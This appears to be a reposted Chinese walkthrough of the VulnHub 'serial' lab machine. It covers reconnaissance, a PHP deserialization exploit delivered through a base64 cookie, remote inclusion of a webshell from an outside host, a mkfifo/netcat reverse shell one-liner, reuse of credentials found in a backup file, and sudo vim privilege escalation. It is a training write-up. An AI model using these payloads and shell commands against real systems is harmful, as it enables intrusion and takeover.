当前位置: 首页 > news >正文

vulnhub-serile靶机通关攻略

下载地址:https://www.vulnhub.com/entry/serial-1,349/

靶机安装特殊,附带安装参考文章:https://zhuanlan.zhihu.com/p/113887109

扫描IP地址

arp-scan -l

扫描端口

nmap -p- 192.168.112.141

访问80端口

线索指向cookie

cookie是base64编码的,解码查看

是一串反序列化的代码

没有头绪

扫描目录

存在backup目录(敏感目录)

访问一下

里面有一个压缩包

下载解压后,有三个php文件

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handle函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出

那我们可以尝试构造payload

尝试读取password文件

因为我们一开始获取的反序列化实在网站的cookie上获取的,所以到了这一步,我们发现,访问80端口将线索指向cookie就是让我们将payload从cookie上传,所以我们要抓包

因为index.php中将cookie的信息进行了base64编码,所以我们上传的也要是经过base64编码过的

<?php 
    class Log { 
        private $type_log = "/etc/passwd"; 
    } 
    class User {
        private $name = "admin"; 
        private $wel; function __construct() {
        $this->wel = new Log(); 
        }
    }
$obj = new User();
echo base64_encode(serialize($obj)); 

成功访问到passwd文件,所以我们可以上传一句话木马

<?php system($_GET['cmd']);?>
//木马使用system,并且必须用GET传参
<?php
 
    class Log {
     public $type_log = "http://192.168.88.88/zxin.txt";
    }
    class User {
         public $name;
         public $wel;
        function __construct($name) {
             $this->name = $name;
             $this->wel = new Log();
        }
    }
    $us = new User("sk4");
    print_r(serialize($us));
?>
O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:29:"http://192.168.88.88/zxin.txt";}}
Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbWUiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6Mjk6Imh0dHA6Ly8xOTIuMTY4Ljg4Ljg4L3p4aW4udHh0Ijt9fQ==

成功写入

接下来反弹shell,将反弹payload放在cmd参数位置,kali进行监听

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.112.132+9999+>/tmp/f

成功反弹shell

来到根目录ls查看文件,发现一个bak备份文件

cat查看是用户名 密码

用户名:sk4

密码:KywZmnPWW6tTbW5w

使用ssh进行登录

成功连接

提权

查看一下sudo授权

发现vim可以利用

sudo vim进入,esc进入编辑模式

输入!/bin/bash

成功提权

来到家目录,ls可以看到flag

http://www.dtcms.com/a/103260.html

相关文章:

  • 在PyCharm 中免费集成Amazon CodeWhisperer
  • 【CSS3】04-标准流 + 浮动 + flex布局
  • 【大模型基础_毛玉仁】5.4 定位编辑法:ROME
  • 嵌入式图像采集与显示系统实战详解:基于V4L2与Framebuffer的实现
  • 单元测试中的测试替身(基于Java的示例)
  • 21 模板方法(Template Method)模式
  • Jmeter(性能指标、指标插件、测试问题、面试题、讲解稿)
  • Linux : System V 共享内存
  • 基于srpingboot智慧校园管理服务平台的设计与实现(源码+文档+部署讲解)
  • 基于SpringBoot的“小说阅读平台”的设计与实现(源码+数据库+文档+PPT)
  • 基于springboot+vue的校园数字化图书馆系统
  • 【RAGFlow】ubuntu22部署ragflow(v0.17.2)
  • Cursor 使用 APIkey 配置 Anthropic Claude BaseURL , gpt-4o,deepseek等大模型代理指南
  • 基于单片机的并联均流电源设计(论文+源码)
  • 《C语言:从诞生到成为编程基石的历史之旅》
  • c# 获取redis中所有的value
  • 快速入手-基于DRF跨域配置django-cors-headers(十三)
  • nodejs 文件相关
  • GRU原理
  • 1.1 轴承故障数据预处理与时频图提取
  • 踏过强化学习的每一步推导
  • C++基础算法(插入排序)
  • 学习如何设计大规模系统,为系统设计面试做准备!
  • Uniapp自定义TabBar组件全封装实践与疑难问题解决方案
  • sscanf() 用法详解
  • docker 安装多次 Jenkins后,插件全部报错
  • G8 的 Morph(形态/变形)转移到 Genesis 9 (G9)
  • 《Java八股文の文艺复兴》第八篇:时空裂缝中的锁竞争——当Synchronized与量子纠缠重构线程安全
  • 探索 Gaggol:理解 10^^^100 的宇宙级常数
  • [TAMUctf 2025]